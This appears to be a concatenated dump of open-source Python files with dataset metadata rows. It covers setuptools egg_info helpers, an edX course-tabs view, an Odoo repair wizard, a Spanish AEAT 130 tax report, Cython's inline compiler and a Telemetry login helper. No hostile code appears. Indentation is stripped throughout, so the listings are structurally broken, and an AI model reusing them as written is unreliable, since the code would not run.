sdist.add_defaults(self)
self.filelist.append(self.template)
self.filelist.append(self.manifest)
rcfiles = list(walk_revctrl())
if rcfiles:
self.filelist.extend(rcfiles)
elif os.path.exists(self.manifest):
self.read_manifest()
ei_cmd = self.get_finalized_command('egg_info')
self.filelist.include_pattern("*", prefix=ei_cmd.egg_info)
def prune_file_list (self):
build = self.get_finalized_command('build')
base_dir = self.distribution.get_fullname()
self.filelist.exclude_pattern(None, prefix=build.build_base)
self.filelist.exclude_pattern(None, prefix=base_dir)
sep = re.escape(os.sep)
self.filelist.exclude_pattern(sep+r'(RCS|CVS|\.svn)'+sep, is_regex=1)
def write_file (filename, contents):
"""Create a file with the specified name and write 'contents' (a
sequence of strings without line terminators) to it.
"""
contents = "\n".join(contents)
if sys.version_info >= (3,):
contents = contents.encode("utf-8")
f = open(filename, "wb") # always write POSIX-style manifest
f.write(contents)
f.close()
def write_pkg_info(cmd, basename, filename):
log.info("writing %s", filename)
if not cmd.dry_run:
metadata = cmd.distribution.metadata
metadata.version, oldver = cmd.egg_version, metadata.version
metadata.name, oldname = cmd.egg_name, metadata.name
try:
# write unescaped data to PKG-INFO, so older pkg_resources
# can still parse it
metadata.write_pkg_info(cmd.egg_info)
finally:
metadata.name, metadata.version = oldname, oldver
safe = getattr(cmd.distribution,'zip_safe',None)
import bdist_egg; bdist_egg.write_safety_flag(cmd.egg_info, safe)
def warn_depends_obsolete(cmd, basename, filename):
if os.path.exists(filename):
log.warn(
"WARNING: 'depends.txt' is not used by setuptools 0.6!\n"
"Use the install_requires/extras_require setup() args instead."
)
def write_requirements(cmd, basename, filename):
dist = cmd.distribution
data = ['\n'.join(yield_lines(dist.install_requires or ()))]
for extra,reqs in (dist.extras_require or {}).items():
data.append('\n\n[%s]\n%s' % (extra, '\n'.join(yield_lines(reqs))))
cmd.write_or_delete_file("requirements", filename, ''.join(data))
def write_toplevel_names(cmd, basename, filename):
pkgs = dict.fromkeys(
[k.split('.',1)[0]
for k in cmd.distribution.iter_distribution_names()
]
)
cmd.write_file("top-level names", filename, '\n'.join(pkgs)+'\n')
def overwrite_arg(cmd, basename, filename):
write_arg(cmd, basename, filename, True)
def write_arg(cmd, basename, filename, force=False):
argname = os.path.splitext(basename)[0]
value = getattr(cmd.distribution, argname, None)
if value is not None:
value = '\n'.join(value)+'\n'
cmd.write_or_delete_file(argname, filename, value, force)
def write_entries(cmd, basename, filename):
ep = cmd.distribution.entry_points
if isinstance(ep,basestring) or ep is None:
data = ep
elif ep is not None:
data = []
for section, contents in ep.items():
if not isinstance(contents,basestring):
contents = EntryPoint.parse_group(section, contents)
contents = '\n'.join(map(str,contents.values()))
data.append('[%s]\n%s\n\n' % (section,contents))
data = ''.join(data)
cmd.write_or_delete_file('entry points', filename, data, True)
def get_pkg_info_revision():
# See if we can get a -r### off of PKG-INFO, in case this is an sdist of
# a subversion revision
#
if os.path.exists('PKG-INFO'):
f = open('PKG-INFO','rU')
for line in f:
match = re.match(r"Version:.*-r(\d+)\s*$", line)
if match:
return int(match.group(1))
f.close()
return 0
#
| mit | -9,050,504,761,539,396,000 | 6,514,908,799,820,552,000 | 31.141975 | 85 | 0.570002 | false |
ak2703/edx-platform | cms/djangoapps/contentstore/views/tabs.py | 125 | 7890 | """
Views related to course tabs
"""
from student.auth import has_course_author_access
from util.json_request import expect_json, JsonResponse
from django.http import HttpResponseNotFound
from django.contrib.auth.decorators import login_required
from django.core.exceptions import PermissionDenied
from django.views.decorators.csrf import ensure_csrf_cookie
from django.views.decorators.http import require_http_methods
from edxmako.shortcuts import render_to_response
from xmodule.modulestore.django import modulestore
from xmodule.modulestore import ModuleStoreEnum
from xmodule.tabs import CourseTabList, CourseTab, InvalidTabsException, StaticTab
from opaque_keys.edx.keys import CourseKey, UsageKey
from ..utils import get_lms_link_for_item
__all__ = ['tabs_handler']
@expect_json
@login_required
@ensure_csrf_cookie
@require_http_methods(("GET", "POST", "PUT"))
def tabs_handler(request, course_key_string):
"""
The restful handler for static tabs.
GET
html: return page for editing static tabs
json: not supported
PUT or POST
json: update the tab order. It is expected that the request body contains a JSON-encoded dict with entry "tabs".
The value for "tabs" is an array of tab locators, indicating the desired order of the tabs.
Creating a tab, deleting a tab, or changing its contents is not supported through this method.
Instead use the general xblock URL (see item.xblock_handler).
"""
course_key = CourseKey.from_string(course_key_string)
if not has_course_author_access(request.user, course_key):
raise PermissionDenied()
course_item = modulestore().get_course(course_key)
if 'application/json' in request.META.get('HTTP_ACCEPT', 'application/json'):
if request.method == 'GET':
raise NotImplementedError('coming soon')
else:
if 'tabs' in request.json:
return reorder_tabs_handler(course_item, request)
elif 'tab_id_locator' in request.json:
return edit_tab_handler(course_item, request)
else:
raise NotImplementedError('Creating or changing tab content is not supported.')
elif request.method == 'GET': # assume html
# get all tabs from the tabs list: static tabs (a.k.a. user-created tabs) and built-in tabs
# present in the same order they are displayed in LMS
tabs_to_render = []
for tab in CourseTabList.iterate_displayable(course_item, inline_collections=False):
if isinstance(tab, StaticTab):
# static tab needs its locator information to render itself as an xmodule
static_tab_loc = course_key.make_usage_key('static_tab', tab.url_slug)
tab.locator = static_tab_loc
tabs_to_render.append(tab)
return render_to_response('edit-tabs.html', {
'context_course': course_item,
'tabs_to_render': tabs_to_render,
'lms_link': get_lms_link_for_item(course_item.location),
})
else:
return HttpResponseNotFound()
def reorder_tabs_handler(course_item, request):
"""
Helper function for handling reorder of tabs request
"""
# Tabs are identified by tab_id or locators.
# The locators are used to identify static tabs since they are xmodules.
# Although all tabs have tab_ids, newly created static tabs do not know
# their tab_ids since the xmodule editor uses only locators to identify new objects.
requested_tab_id_locators = request.json['tabs']
# original tab list in original order
old_tab_list = course_item.tabs
# create a new list in the new order
new_tab_list = []
for tab_id_locator in requested_tab_id_locators:
tab = get_tab_by_tab_id_locator(old_tab_list, tab_id_locator)
if tab is None:
return JsonResponse(
{"error": "Tab with id_locator '{0}' does not exist.".format(tab_id_locator)}, status=400
)
new_tab_list.append(tab)
# the old_tab_list may contain additional tabs that were not rendered in the UI because of
# global or course settings. so add those to the end of the list.
non_displayed_tabs = set(old_tab_list) - set(new_tab_list)
new_tab_list.extend(non_displayed_tabs)
# validate the tabs to make sure everything is Ok (e.g., did the client try to reorder unmovable tabs?)
try:
CourseTabList.validate_tabs(new_tab_list)
except InvalidTabsException, exception:
return JsonResponse(
{"error": "New list of tabs is not valid: {0}.".format(str(exception))}, status=400
)
# persist the new order of the tabs
course_item.tabs = new_tab_list
modulestore().update_item(course_item, request.user.id)
return JsonResponse()
def edit_tab_handler(course_item, request):
"""
Helper function for handling requests to edit settings of a single tab
"""
# Tabs are identified by tab_id or locator
tab_id_locator = request.json['tab_id_locator']
# Find the given tab in the course
tab = get_tab_by_tab_id_locator(course_item.tabs, tab_id_locator)
if tab is None:
return JsonResponse(
{"error": "Tab with id_locator '{0}' does not exist.".format(tab_id_locator)}, status=400
)
if 'is_hidden' in request.json:
# set the is_hidden attribute on the requested tab
tab.is_hidden = request.json['is_hidden']
modulestore().update_item(course_item, request.user.id)
else:
raise NotImplementedError('Unsupported request to edit tab: {0}'.format(request.json))
return JsonResponse()
def get_tab_by_tab_id_locator(tab_list, tab_id_locator):
"""
Look for a tab with the specified tab_id or locator. Returns the first matching tab.
"""
if 'tab_id' in tab_id_locator:
tab = CourseTabList.get_tab_by_id(tab_list, tab_id_locator['tab_id'])
elif 'tab_locator' in tab_id_locator:
tab = get_tab_by_locator(tab_list, tab_id_locator['tab_locator'])
return tab
def get_tab_by_locator(tab_list, usage_key_string):
"""
Look for a tab with the specified locator. Returns the first matching tab.
"""
tab_location = UsageKey.from_string(usage_key_string)
item = modulestore().get_item(tab_location)
static_tab = StaticTab(
name=item.display_name,
url_slug=item.location.name,
)
return CourseTabList.get_tab_by_id(tab_list, static_tab.tab_id)
# "primitive" tab edit functions driven by the command line.
# These should be replaced/deleted by a more capable GUI someday.
# Note that the command line UI identifies the tabs with 1-based
# indexing, but this implementation code is standard 0-based.
def validate_args(num, tab_type):
"Throws for the disallowed cases."
if num <= 1:
raise ValueError('Tabs 1 and 2 cannot be edited')
if tab_type == 'static_tab':
raise ValueError('Tabs of type static_tab cannot be edited here (use Studio)')
def primitive_delete(course, num):
"Deletes the given tab number (0 based)."
tabs = course.tabs
validate_args(num, tabs[num].get('type', ''))
del tabs[num]
# Note for future implementations: if you delete a static_tab, then Chris Dodge
# points out that there's other stuff to delete beyond this element.
# This code happens to not delete static_tab so it doesn't come up.
modulestore().update_item(course, ModuleStoreEnum.UserID.primitive_command)
def primitive_insert(course, num, tab_type, name):
"Inserts a new tab at the given number (0 based)."
validate_args(num, tab_type)
new_tab = CourseTab.from_json({u'type': unicode(tab_type), u'name': unicode(name)})
tabs = course.tabs
tabs.insert(num, new_tab)
modulestore().update_item(course, ModuleStoreEnum.UserID.primitive_command)
| agpl-3.0 | 6,634,828,489,788,347,000 | 3,806,930,545,987,237,000 | 37.866995 | 120 | 0.679341 | false |
credativUK/OCB | addons/mrp_repair/wizard/cancel_repair.py | 52 | 3699 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import osv,fields
from openerp.tools.translate import _
class repair_cancel(osv.osv_memory):
_name = 'mrp.repair.cancel'
_description = 'Cancel Repair'
def cancel_repair(self, cr, uid, ids, context=None):
""" Cancels the repair
@param self: The object pointer.
@param cr: A database cursor
@param uid: ID of the user currently logged in
@param ids: List of IDs selected
@param context: A standard dictionary
@return:
"""
if context is None:
context = {}
record_id = context and context.get('active_id', False) or False
assert record_id, _('Active ID not Found')
repair_order_obj = self.pool.get('mrp.repair')
repair_line_obj = self.pool.get('mrp.repair.line')
repair_order = repair_order_obj.browse(cr, uid, record_id, context=context)
if repair_order.invoiced or repair_order.invoice_method == 'none':
repair_order_obj.action_cancel(cr, uid, [record_id], context=context)
else:
raise osv.except_osv(_('Warning!'),_('Repair order is not invoiced.'))
return {'type': 'ir.actions.act_window_close'}
def fields_view_get(self, cr, uid, view_id=None, view_type='form', context=None, toolbar=False, submenu=False):
""" Changes the view dynamically
@param self: The object pointer.
@param cr: A database cursor
@param uid: ID of the user currently logged in
@param context: A standard dictionary
@return: New arch of view.
"""
if context is None:
context = {}
res = super(repair_cancel, self).fields_view_get(cr, uid, view_id=view_id, view_type=view_type, context=context, toolbar=toolbar,submenu=False)
record_id = context and context.get('active_id', False) or False
active_model = context.get('active_model')
if not record_id or (active_model and active_model != 'mrp.repair'):
return res
repair_order = self.pool.get('mrp.repair').browse(cr, uid, record_id, context=context)
if not repair_order.invoiced:
res['arch'] = """
<form string="Cancel Repair" version="7.0">
<header>
<button name="cancel_repair" string="_Yes" type="object" class="oe_highlight"/>
or
<button string="Cancel" class="oe_link" special="cancel"/>
</header>
<label string="Do you want to continue?"/>
</form>
"""
return res
repair_cancel()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | -8,809,869,015,440,510,000 | 1,593,869,383,462,216,200 | 41.517241 | 151 | 0.592322 | false |
cubells/l10n-spain | l10n_es_aeat_mod130/models/mod130.py | 1 | 10541 | # Copyright 2014-2019 Tecnativa - Pedro M. Baeza
from odoo import _, api, fields, exceptions, models
def trunc(f, n):
slen = len('%.*f' % (n, f))
return float(str(f)[:slen])
class L10nEsAeatMod130Report(models.Model):
_description = "AEAT 130 report"
_inherit = "l10n.es.aeat.report"
_name = "l10n.es.aeat.mod130.report"
_aeat_number = '130'
company_partner_id = fields.Many2one('res.partner',
string='Company partner',
relation='company_id.partner_id',
store=True)
currency_id = fields.Many2one('res.currency', string='Currency',
relation='company_id.currency_id',
store=True)
activity_type = fields.Selection(
[('primary', 'Actividad agrícola, ganadera, forestal o pesquera'),
('other', 'Actividad distinta a las anteriores')],
string='Tipo de actividad', states={'draft': [('readonly', False)]},
readonly=True, required=True, default='other')
has_deduccion_80 = fields.Boolean(
string="¿Deducción por art. 80 bis?",
states={'draft': [('readonly', False)]}, readonly=True,
help="Permite indicar si puede beneficiarse de la deducción por "
"obtención de rendimientos de actividades económicas a efectos del "
"pago fraccionado por cumplir el siguiente requisito:\n Que, en el "
"primer trimestre del ejercicio o en el primer trimestre de inicio de "
"actividades, la suma del resultado de elevar al año el importe de la "
"casilla 03 y/o, en su caso, el resultado de elevar al año el 25 por "
"100 de la casilla 08, sea igual o inferior a 12.000 euros. En los "
"supuestos de inicio de la actividad a lo largo del ejercicio en la "
"elevación al año se tendrán en consideración los días que resten "
"hasta el final del año.", default=False)
has_prestamo = fields.Boolean(
string="¿Préstamo para vivienda habitual?",
states={'draft': [('readonly', False)]}, readonly=True,
help="Permite indicar si destina cantidades al pago de préstamos "
"para la adquisición o rehabilitación de la vivienda habitual. Si "
"marca la casilla, se podrá realiza un 2% de deducción sobre el "
"importe de la casilla [03], con un máximo de 660,14 € por trimestre, "
"o del 2% de la casilla [08], con un máximo de 660,14 euros anuales. "
"\nDebe consultar las excepciones para las que no se computaría "
"la deducción a pesar del préstamo.", default=False)
comments = fields.Char(
string="Observaciones", size=350, readonly=True,
help="Observaciones que se adjuntarán con el modelo",
states={'draft': [('readonly', False)]})
casilla_01 = fields.Monetary(
string="Casilla [01] - Ingresos",
readonly=True,
)
real_expenses = fields.Monetary(
string="Gastos reales",
help="Gastos en el periodo sin contar con el 5% adicional de difícil "
"justificación.",
)
non_justified_expenses = fields.Monetary(
string="Gastos de difícil justificación",
help="Calculado como el 5% del rendimiento del periodo (ingresos - "
"gastos reales).",
)
casilla_02 = fields.Monetary(string="Casilla [02] - Gastos", readonly=True)
casilla_03 = fields.Monetary(
string="Casilla [03] - Rendimiento",
readonly=True,
)
casilla_04 = fields.Monetary(string="Casilla [04] - IRPF", readonly=True)
casilla_05 = fields.Monetary(string="Casilla [05]")
casilla_06 = fields.Monetary(string="Casilla [06]", readonly=True)
casilla_07 = fields.Monetary(string="Casilla [07]", readonly=True)
casilla_08 = fields.Monetary(
string="Casilla [08] - Ingresos primario",
readonly=True,
)
casilla_09 = fields.Monetary(
string="Casilla [09] - IRPF primario",
readonly=True,
)
casilla_10 = fields.Monetary(string="Casilla [10]", readonly=True)
casilla_11 = fields.Monetary(string="Casilla [11]", readonly=True)
casilla_12 = fields.Monetary(string="Casilla [12]", readonly=True)
casilla_13 = fields.Monetary(
string="Casilla [13] - Deducción art. 80 bis",
readonly=True,
)
casilla_14 = fields.Monetary(string="Casilla [14]", readonly=True)
casilla_15 = fields.Monetary(string="Casilla [15]", readonly=True)
casilla_16 = fields.Monetary(
string="Casilla [16] - Deducción por pago de hipoteca",
readonly=True,
)
casilla_17 = fields.Monetary(string="Casilla [17]", readonly=True)
casilla_18 = fields.Monetary(string="Casilla [18]", readonly=True)
result = fields.Monetary(
string="Resultado",
compute="_compute_result",
store=True,
)
tipo_declaracion = fields.Selection(
selection=[
('I', 'A ingresar'),
('N', 'Negativa'),
('B', 'A deducir')
],
string='Tipo declaración',
compute="_compute_tipo_declaracion",
store=True,
)
@api.depends('casilla_18', 'casilla_17')
def _compute_result(self):
for report in self:
report.result = report.casilla_17 - report.casilla_18
@api.depends('result')
def _compute_tipo_declaracion(self):
for report in self:
if report.result < 0:
report.tipo_declaracion = (
"B" if report.period_type != '4T' else "N"
)
else:
report.tipo_declaracion = "I"
@api.multi
def _calc_ingresos_gastos(self):
self.ensure_one()
aml_obj = self.env['account.move.line']
date_start = '%s-01-01' % self.year
extra_domain = [
('company_id', '=', self.company_id.id),
('date', '>=', date_start),
('date', '<=', self.date_end),
]
groups = aml_obj.read_group([
('account_id.code', '=like', '7%'),
] + extra_domain, ['balance'], [])
incomes = groups[0]['balance'] and -groups[0]['balance'] or 0.0
groups = aml_obj.read_group([
('account_id.code', '=like', '6%'),
] + extra_domain, ['balance'], [])
expenses = groups[0]['balance'] or 0.0
return (incomes, expenses)
@api.multi
def _calc_prev_trimesters_data(self):
self.ensure_one()
amount = 0
prev_reports = self._get_previous_fiscalyear_reports(self.date_start)
for prev in prev_reports:
if prev.casilla_07 > 0:
amount += prev.casilla_07 - prev.casilla_16
return amount
@api.multi
def calculate(self):
for report in self:
if report.activity_type == 'primary':
raise exceptions.Warning(_('Este tipo de actividad no '
'está aún soportado por el módulo.'))
if report.has_deduccion_80:
raise exceptions.Warning(_(
'No se pueden calcular por el '
'momento declaraciones que contengan deducciones por el '
'artículo 80 bis.'))
vals = {}
if report.activity_type == 'other':
ingresos, gastos = report._calc_ingresos_gastos()
vals['casilla_01'] = ingresos
vals['real_expenses'] = gastos
rendimiento_bruto = (ingresos - gastos)
if rendimiento_bruto > 0:
vals['non_justified_expenses'] = round(
rendimiento_bruto * 0.05, 2
)
else:
vals['non_justified_expenses'] = 0.0
vals['casilla_02'] = gastos + vals['non_justified_expenses']
# Rendimiento
vals['casilla_03'] = ingresos - vals['casilla_02']
# IRPF - Truncar resultado, ya que es lo que hace la AEAT
if vals['casilla_03'] < 0:
vals['casilla_04'] = 0.0
else:
vals['casilla_04'] = trunc(0.20 * vals['casilla_03'], 2)
# Pago fraccionado previo del trimestre
vals['casilla_05'] = report._calc_prev_trimesters_data()
vals['casilla_07'] = (vals['casilla_04'] - vals['casilla_05'] -
report.casilla_06)
vals['casilla_12'] = vals['casilla_07']
if vals['casilla_12'] < 0:
vals['casilla_12'] = 0.0
else:
# TODO: Modelo 130 para actividades primarias
vals['casilla_12'] = vals['casilla_11']
# TODO: Deducción artículo 80 bis
vals['casilla_13'] = 0.0
vals['casilla_14'] = vals['casilla_12'] - vals['casilla_13']
# TODO: Poner los resultados negativos de anteriores trimestres
vals['casilla_15'] = 0.0
# Deducción por hipóteca
if report.has_prestamo and vals['casilla_14'] > 0:
# Truncar resultado, ya que es lo que hace la AEAT
deduccion = trunc(0.02 * vals['casilla_03'], 2)
if report.activity_type == 'other':
if deduccion > 660.14:
deduccion = 660.14
else:
raise exceptions.Warning(_('No implementado'))
dif = vals['casilla_14'] - vals['casilla_15']
if deduccion > dif:
deduccion = dif
vals['casilla_16'] = deduccion
else:
vals['casilla_16'] = 0.0
vals['casilla_17'] = (vals['casilla_14'] - vals['casilla_15'] -
vals['casilla_16'])
report.write(vals)
return True
@api.multi
def button_confirm(self):
"""Check its records"""
msg = ""
for report in self:
if report.type == 'C' and not report.casilla_18:
msg = _(
'Debe introducir una cantidad en la casilla 18 como '
'ha marcado la casilla de declaración complementaria.'
)
if msg:
raise exceptions.ValidationError(msg)
return super(L10nEsAeatMod130Report, self).button_confirm()
| agpl-3.0 | -3,657,639,101,636,251,000 | -840,379,408,278,233,700 | 42.551867 | 79 | 0.550114 | false |
collinjackson/mojo | third_party/cython/src/Cython/Build/Inline.py | 89 | 10878 | import sys, os, re, inspect
import imp
try:
import hashlib
except ImportError:
import md5 as hashlib
from distutils.core import Distribution, Extension
from distutils.command.build_ext import build_ext
import Cython
from Cython.Compiler.Main import Context, CompilationOptions, default_options
from Cython.Compiler.ParseTreeTransforms import CythonTransform, SkipDeclarations, AnalyseDeclarationsTransform
from Cython.Compiler.TreeFragment import parse_from_strings
from Cython.Build.Dependencies import strip_string_literals, cythonize, cached_function
from Cython.Compiler import Pipeline
from Cython.Utils import get_cython_cache_dir
import cython as cython_module
# A utility function to convert user-supplied ASCII strings to unicode.
if sys.version_info[0] < 3:
def to_unicode(s):
if not isinstance(s, unicode):
return s.decode('ascii')
else:
return s
else:
to_unicode = lambda x: x
class AllSymbols(CythonTransform, SkipDeclarations):
def __init__(self):
CythonTransform.__init__(self, None)
self.names = set()
def visit_NameNode(self, node):
self.names.add(node.name)
@cached_function
def unbound_symbols(code, context=None):
code = to_unicode(code)
if context is None:
context = Context([], default_options)
from Cython.Compiler.ParseTreeTransforms import AnalyseDeclarationsTransform
tree = parse_from_strings('(tree fragment)', code)
for phase in Pipeline.create_pipeline(context, 'pyx'):
if phase is None:
continue
tree = phase(tree)
if isinstance(phase, AnalyseDeclarationsTransform):
break
symbol_collector = AllSymbols()
symbol_collector(tree)
unbound = []
try:
import builtins
except ImportError:
import __builtin__ as builtins
for name in symbol_collector.names:
if not tree.scope.lookup(name) and not hasattr(builtins, name):
unbound.append(name)
return unbound
def unsafe_type(arg, context=None):
py_type = type(arg)
if py_type is int:
return 'long'
else:
return safe_type(arg, context)
def safe_type(arg, context=None):
py_type = type(arg)
if py_type in [list, tuple, dict, str]:
return py_type.__name__
elif py_type is complex:
return 'double complex'
elif py_type is float:
return 'double'
elif py_type is bool:
return 'bint'
elif 'numpy' in sys.modules and isinstance(arg, sys.modules['numpy'].ndarray):
return 'numpy.ndarray[numpy.%s_t, ndim=%s]' % (arg.dtype.name, arg.ndim)
else:
for base_type in py_type.mro():
if base_type.__module__ in ('__builtin__', 'builtins'):
return 'object'
module = context.find_module(base_type.__module__, need_pxd=False)
if module:
entry = module.lookup(base_type.__name__)
if entry.is_type:
return '%s.%s' % (base_type.__module__, base_type.__name__)
return 'object'
def _get_build_extension():
dist = Distribution()
# Ensure the build respects distutils configuration by parsing
# the configuration files
config_files = dist.find_config_files()
dist.parse_config_files(config_files)
build_extension = build_ext(dist)
build_extension.finalize_options()
return build_extension
@cached_function
def _create_context(cython_include_dirs):
return Context(list(cython_include_dirs), default_options)
def cython_inline(code,
get_type=unsafe_type,
lib_dir=os.path.join(get_cython_cache_dir(), 'inline'),
cython_include_dirs=['.'],
force=False,
quiet=False,
locals=None,
globals=None,
**kwds):
if get_type is None:
get_type = lambda x: 'object'
code = to_unicode(code)
orig_code = code
code, literals = strip_string_literals(code)
code = strip_common_indent(code)
ctx = _create_context(tuple(cython_include_dirs))
if locals is None:
locals = inspect.currentframe().f_back.f_back.f_locals
if globals is None:
globals = inspect.currentframe().f_back.f_back.f_globals
try:
for symbol in unbound_symbols(code):
if symbol in kwds:
continue
elif symbol in locals:
kwds[symbol] = locals[symbol]
elif symbol in globals:
kwds[symbol] = globals[symbol]
else:
print("Couldn't find ", symbol)
except AssertionError:
if not quiet:
# Parsing from strings not fully supported (e.g. cimports).
print("Could not parse code as a string (to extract unbound symbols).")
cimports = []
for name, arg in kwds.items():
if arg is cython_module:
cimports.append('\ncimport cython as %s' % name)
del kwds[name]
arg_names = kwds.keys()
arg_names.sort()
arg_sigs = tuple([(get_type(kwds[arg], ctx), arg) for arg in arg_names])
key = orig_code, arg_sigs, sys.version_info, sys.executable, Cython.__version__
module_name = "_cython_inline_" + hashlib.md5(str(key).encode('utf-8')).hexdigest()
if module_name in sys.modules:
module = sys.modules[module_name]
else:
build_extension = None
if cython_inline.so_ext is None:
# Figure out and cache current extension suffix
build_extension = _get_build_extension()
cython_inline.so_ext = build_extension.get_ext_filename('')
module_path = os.path.join(lib_dir, module_name + cython_inline.so_ext)
if not os.path.exists(lib_dir):
os.makedirs(lib_dir)
if force or not os.path.isfile(module_path):
cflags = []
c_include_dirs = []
qualified = re.compile(r'([.\w]+)[.]')
for type, _ in arg_sigs:
m = qualified.match(type)
if m:
cimports.append('\ncimport %s' % m.groups()[0])
# one special case
if m.groups()[0] == 'numpy':
import numpy
c_include_dirs.append(numpy.get_include())
# cflags.append('-Wno-unused')
module_body, func_body = extract_func_code(code)
params = ', '.join(['%s %s' % a for a in arg_sigs])
module_code = """
%(module_body)s
%(cimports)s
def __invoke(%(params)s):
%(func_body)s
""" % {'cimports': '\n'.join(cimports), 'module_body': module_body, 'params': params, 'func_body': func_body }
for key, value in literals.items():
module_code = module_code.replace(key, value)
pyx_file = os.path.join(lib_dir, module_name + '.pyx')
fh = open(pyx_file, 'w')
try:
fh.write(module_code)
finally:
fh.close()
extension = Extension(
name = module_name,
sources = [pyx_file],
include_dirs = c_include_dirs,
extra_compile_args = cflags)
if build_extension is None:
build_extension = _get_build_extension()
build_extension.extensions = cythonize([extension], include_path=cython_include_dirs, quiet=quiet)
build_extension.build_temp = os.path.dirname(pyx_file)
build_extension.build_lib = lib_dir
build_extension.run()
module = imp.load_dynamic(module_name, module_path)
arg_list = [kwds[arg] for arg in arg_names]
return module.__invoke(*arg_list)
# Cached suffix used by cython_inline above. None should get
# overridden with actual value upon the first cython_inline invocation
cython_inline.so_ext = None
non_space = re.compile('[^ ]')
def strip_common_indent(code):
min_indent = None
lines = code.split('\n')
for line in lines:
match = non_space.search(line)
if not match:
continue # blank
indent = match.start()
if line[indent] == '#':
continue # comment
elif min_indent is None or min_indent > indent:
min_indent = indent
for ix, line in enumerate(lines):
match = non_space.search(line)
if not match or line[indent] == '#':
continue
else:
lines[ix] = line[min_indent:]
return '\n'.join(lines)
module_statement = re.compile(r'^((cdef +(extern|class))|cimport|(from .+ cimport)|(from .+ import +[*]))')
def extract_func_code(code):
module = []
function = []
current = function
code = code.replace('\t', ' ')
lines = code.split('\n')
for line in lines:
if not line.startswith(' '):
if module_statement.match(line):
current = module
else:
current = function
current.append(line)
return '\n'.join(module), ' ' + '\n '.join(function)
try:
from inspect import getcallargs
except ImportError:
def getcallargs(func, *arg_values, **kwd_values):
all = {}
args, varargs, kwds, defaults = inspect.getargspec(func)
if varargs is not None:
all[varargs] = arg_values[len(args):]
for name, value in zip(args, arg_values):
all[name] = value
for name, value in kwd_values.items():
if name in args:
if name in all:
raise TypeError("Duplicate argument %s" % name)
all[name] = kwd_values.pop(name)
if kwds is not None:
all[kwds] = kwd_values
elif kwd_values:
raise TypeError("Unexpected keyword arguments: %s" % kwd_values.keys())
if defaults is None:
defaults = ()
first_default = len(args) - len(defaults)
for ix, name in enumerate(args):
if name not in all:
if ix >= first_default:
all[name] = defaults[ix - first_default]
else:
raise TypeError("Missing argument: %s" % name)
return all
def get_body(source):
ix = source.index(':')
if source[:5] == 'lambda':
return "return %s" % source[ix+1:]
else:
return source[ix+1:]
# Lots to be done here... It would be especially cool if compiled functions
# could invoke each other quickly.
class RuntimeCompiledFunction(object):
def __init__(self, f):
self._f = f
self._body = get_body(inspect.getsource(f))
def __call__(self, *args, **kwds):
all = getcallargs(self._f, *args, **kwds)
return cython_inline(self._body, locals=self._f.func_globals, globals=self._f.func_globals, **all)
| bsd-3-clause | 3,451,448,706,579,078,000 | -2,717,700,032,969,823,000 | 34.782895 | 122 | 0.585034 | false |
yury-s/v8-inspector | Source/chrome/tools/telemetry/telemetry/core/backends/form_based_credentials_backend.py | 24 | 3604 | # Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import logging
from telemetry.core import exceptions
class FormBasedCredentialsBackend(object):
def __init__(self):
self._logged_in = False
def IsAlreadyLoggedIn(self, tab):
return tab.EvaluateJavaScript(self.logged_in_javascript)
@property
def credentials_type(self):
raise NotImplementedError()
@property
def url(self):
raise NotImplementedError()
@property
def login_form_id(self):
raise NotImplementedError()
@property
def login_button_javascript(self):
"""Some sites have custom JS to log in."""
return None
@property
def login_input_id(self):
raise NotImplementedError()
@property
def password_input_id(self):
raise NotImplementedError()
@property
def logged_in_javascript(self):
"""Evaluates to true iff already logged in."""
raise NotImplementedError()
def IsLoggedIn(self):
return self._logged_in
def _ResetLoggedInState(self):
"""Makes the backend think we're not logged in even though we are.
Should only be used in unit tests to simulate --dont-override-profile.
"""
self._logged_in = False
def _WaitForLoginState(self, action_runner):
"""Waits until it can detect either the login form, or already logged in."""
condition = '(document.querySelector("#%s") !== null) || (%s)' % (
self.login_form_id, self.logged_in_javascript)
action_runner.WaitForJavaScriptCondition(condition, 60)
def _SubmitLoginFormAndWait(self, action_runner, tab, username, password):
"""Submits the login form and waits for the navigation."""
tab.WaitForDocumentReadyStateToBeInteractiveOrBetter()
email_id = 'document.querySelector("#%s #%s").value = "%s"; ' % (
self.login_form_id, self.login_input_id, username)
password = 'document.querySelector("#%s #%s").value = "%s"; ' % (
self.login_form_id, self.password_input_id, password)
tab.ExecuteJavaScript(email_id)
tab.ExecuteJavaScript(password)
if self.login_button_javascript:
tab.ExecuteJavaScript(self.login_button_javascript)
else:
tab.ExecuteJavaScript(
'document.getElementById("%s").submit();' % self.login_form_id)
# Wait for the form element to disappear as confirmation of the navigation.
action_runner.WaitForNavigate()
def LoginNeeded(self, tab, action_runner, config):
"""Logs in to a test account.
Raises:
RuntimeError: if could not get credential information.
"""
if self._logged_in:
return True
if 'username' not in config or 'password' not in config:
message = ('Credentials for "%s" must include username and password.' %
self.credentials_type)
raise RuntimeError(message)
logging.debug('Logging into %s account...' % self.credentials_type)
if 'url' in config:
url = config['url']
else:
url = self.url
try:
logging.info('Loading %s...', url)
tab.Navigate(url)
self._WaitForLoginState(action_runner)
if self.IsAlreadyLoggedIn(tab):
self._logged_in = True
return True
self._SubmitLoginFormAndWait(
action_runner, tab, config['username'], config['password'])
self._logged_in = True
return True
except exceptions.TimeoutException:
logging.warning('Timed out while loading: %s', url)
return False
def LoginNoLongerNeeded(self, tab): # pylint: disable=W0613
assert self._logged_in
| bsd-3-clause | 2,131,944,338,850,221,800 | 4,402,087,261,043,419,600 | 29.285714 | 80 | 0.67758 | false |
amitdeutsch/oppia | jinja_utils_test.py | 9 | 4194 | # coding: utf-8
#
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
